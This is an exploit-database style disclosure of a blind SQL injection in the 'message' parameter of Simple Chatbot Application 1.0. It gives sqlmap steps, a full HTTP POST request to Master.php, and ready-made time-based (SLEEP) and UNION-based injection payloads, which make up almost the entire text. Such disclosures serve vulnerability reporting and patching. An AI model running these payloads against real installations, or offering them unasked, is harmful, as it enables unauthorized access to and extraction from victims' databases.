# Exploit Title: Simple Chatbot Application 1.0 - 'message' Blind SQLi # Date: 18/01/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html # Version: 1.0 # Tested on: XAMPP, Windows 10 # Steps # Go to : http://127.0.0.1/classes/Master.php?f=get_response # Save request in BurpSuite # Run saved request with sqlmap -r sql.txt ====== POST /classes/Master.php?f=get_response HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=45l30lmah262k7mmg2u5tktbc2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Content-Length: 73 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Connection: Keep-alive message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud ====== #Payloads #Payload (UNION query) message=-8150' UNION ALL SELECT CONCAT(0x717a766b71,0x6d466451694363565172525259434d436c53677974774a424b635856784f4d5a41594e4e75424474,0x716a7a7171),NULL-- - #(AND/OR time-based blind) message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud